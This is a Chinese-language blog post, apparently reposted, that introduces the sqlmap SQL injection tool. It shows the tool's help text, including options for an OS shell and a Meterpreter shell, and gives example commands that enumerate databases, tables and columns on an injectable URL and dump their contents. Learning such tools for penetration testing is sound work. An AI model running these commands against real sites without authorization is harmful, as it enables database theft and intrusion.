sql注入工具:sqlmap命令

Posted diligenceday

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sql注入工具:sqlmap命令相关的知识,希望对你有一定的参考价值。

  sqlmap是一款专业的sql注入工具, 让你告别人工注入, 程序高效自动注入

  前提是你有找到注入点 , 工具的官方网站:http://sqlmap.org/

  kali系统默认安装sqlmap, 不需要额外安装:

  sqlmap的命令行帮助:

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.11#stable}
|_ -| . [,]     | .| . |
|___|_  []_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

Usage: python sqlmap [options]

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show programs version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be provided to define the
    target(s)

    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs

  Request:
    These options can be used to specify how to connect to the target URL

    --data=DATA         Data string to be sent through POST
    --cookie=COOKIE     HTTP Cookie header value
    --random-agent      Use randomly selected HTTP User-Agent header value
    --proxy=PROXY       Use a proxy to connect to the target URL
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to this value

  Detection:
    These options can be used to customize the detection phase

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)

  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques

    --technique=TECH    SQL injection techniques to use (default "BEUSTQ")

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --passwords         Enumerate DBMS users password hashes
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC

  General:
    These options can be used to set some general working parameters

    --batch             Never ask for user input, use the default behaviour
    --flush-session     Flush session files for current target

  Miscellaneous:
    --sqlmap-shell      Prompt for an interactive sqlmap shell
    --wizard            Simple wizard interface for beginner users

  枚举数据库列表:

sqlmap -u http://URL地址/index.php?id=1 --dbs

  根据数据库, 枚举数据库表:

sqlmap -u http://URL地址/index.php?id=1 -D 数据库 --tables

  根据数据库和,数据库表, 枚举数据表结构:

sqlmap -u http://URL地址/index.php?id=1 -D 数据库 -T 数据库表 --columns

  根据数据库表结构, 枚举表数据:

sqlmap -u http://URL地址/index.php?id=1 -D 数据库 -T 数据库表 -C 数据库表名1,数据库表名2 --dump

 

 

 

技术分享图片 作者: NONO
出处:http://www.cnblogs.com/diligenceday/
企业网站:http://www.idrwl.com/
开源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830 

以上是关于sql注入工具:sqlmap命令的主要内容,如果未能解决你的问题,请参考以下文章

sql注入神器 - sqlmap

3_SQL注入攻击_3_SQLmap自动化注入攻击

sqlmap注入工具

sqlmap常用命令

SQLiScanner:一款基于SQLMAP和Charles的被动SQL 注入漏洞扫描工具

安全牛学习笔记SQLMAP- 自动注入